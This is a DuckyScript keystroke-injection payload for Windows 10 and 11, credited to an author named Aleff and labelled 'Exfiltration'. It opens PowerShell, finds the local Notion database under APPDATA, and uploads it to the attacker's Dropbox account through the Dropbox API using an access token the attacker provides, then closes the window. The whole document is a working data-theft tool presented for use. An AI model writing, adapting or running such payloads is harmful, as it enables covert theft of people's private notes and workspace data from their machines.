* #########################################################################
* #                                                                       |
* # Title        : Exfiltrates the entire database of the Notion client   |
* # Author       : Aleff                                                  |
* # Version      : 1.0                                                    |
* # Category     : Exfiltration                                           |
* # Target       : Windows 10-11                                          |
* #                                                                       |
* #########################################################################


* Requirements:
*     - Notion must be installed
*     - Internet Connection


GUI r
DELAY 1000
STRING PowerShell
ENTER
DELAY 2000

* You must define your Dropbox accessToken or modify the exfiltration modality.
STRING $accessToken = "DROPBOX_ACCESS_TOKEN"
ENTER

* Settings about Notion DB
STRING $NotionPath = Join-Path -Path $env:APPDATA -ChildPath 'Notion'
ENTER
STRING $NotionDatabasePath = Join-Path -Path $NotionPath -ChildPath "notion.db"
ENTER
STRING $authHeader = @{Authorization = "Bearer $accessToken"}
ENTER
STRING $uploadUrl = "https://content.dropboxapi.com/2/files/upload"
ENTER
STRING $dropboxFilePath = "/notion.db"
ENTER
STRING $headers = @{}
ENTER
STRING $headers.Add("Authorization", "Bearer $accessToken")
ENTER
STRING $headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
ENTER
STRING $headers.Add("Content-Type", "application/octet-stream")

ENTER
STRING Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $NotionDatabasePath; exit;

